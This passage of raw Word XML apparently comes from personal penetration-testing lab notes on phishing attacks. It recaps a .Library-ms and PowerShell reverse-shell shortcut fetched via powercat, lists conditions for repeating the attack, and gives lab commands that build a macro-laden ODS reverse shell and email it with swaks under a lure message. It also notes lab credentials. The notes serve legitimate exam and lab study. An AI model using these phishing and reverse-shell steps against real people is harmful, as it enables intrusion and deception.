      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1350"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You created a .Library-ms file and a PowerShell reverse shell shortcut.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000275C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1350"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Social engineering component</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000275D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1350"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Convincing message body, realistic sender (maildmz), and proper formatting.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000275E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1350"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">No outbound firewall restrictions on victim</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000275F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1350"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Victim machine must be able to reach your Kali box on:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002760">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1350"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Port 8000 (to download powercat.ps1)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002761">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1350"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Port 4444 (for reverse shell connection)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002762">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002763">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bonus: How to Know if You Can Repeat This Attack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002764">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To know if you can pull this off on another box:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002765">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="807"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Scan for port 587 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">open with AUTH LOGIN in banner.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002766">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="807"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Check if you’ve recovered any valid SMTP creds from the environment.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002767">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="807"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ensure the victim can access your attacker infrastructure (http://&lt;your_ip&gt;:8000, WebDAV, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002768">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="807"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Victim must be likely to click or open the payload (requires GUI access like RDP, phishing email access, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002769">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000276A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2387600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="294" name="image285.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image285.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId81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276B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000276C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_gdu9g7wd60mb" w:id="344"/>
      <w:bookmarkEnd w:id="344"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Webadv explained</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000276D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000276E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="4229100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="476" name="image455.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image455.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId815"/>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276F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2844800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="262" name="image259.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image259.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8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2770">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002771">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002772">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_5ni37hc4eff" w:id="345"/>
      <w:bookmarkEnd w:id="345"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Another phishing example (with malicious ODS file containing a macro for a reverse shell)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002773">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002774">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This was seen in the Hepet PG practice. There were 2 writeups I read, and they did it differently. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002775">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002776">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="757"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId817">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2777">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="757"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Used </w:t>
      </w:r>
      <w:hyperlink r:id="rId818">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tool to create malicious ODS containing a macro for a reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002778">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="757"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 mmg-ods.py windows 192.168.45.159 1337</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002779">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="757"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Set up python host</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000277A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="757"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then used </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">swkas </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to send mail</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000277B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="757"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo swaks -t mailadmin@localhost --from jonas@localhost --attach @file.ods --server 192.168.134.149 --body "Please check this spreadsheet" --header "Subject: Please check this spreadsheet"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000277C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000277D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="757"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId819">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">This</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:hyperlink r:id="rId820">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">original</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">writeup:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000277E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="757"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Used the LibreOffice GUI app in order to create ODS file with macro</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000277F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="757"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then used a tool called "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sendemail</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" to send it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002780">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="757"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">They didn't show the steps as clearly</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002781">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002782">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002783">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_aqx3k1hl133q" w:id="346"/>
      <w:bookmarkEnd w:id="346"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Another phishing example (sending email with keywords and putting our http://&lt;IP&gt; in email)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002784">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002785">
      <w:pPr>
        <w:ind w:left="-1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="7643813" cy="5157123"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="447" name="image462.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image462.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId821"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="7643813" cy="5157123"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002786">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1110"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here the creds were </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sales:sales</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002787">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1110"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here, you can see we only have 1 message and it had a size of 683</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1110"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">They crafted mail using SMTP but they made it scratch within SMTP without using tools like swaks or sendmail</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002789">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1110"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
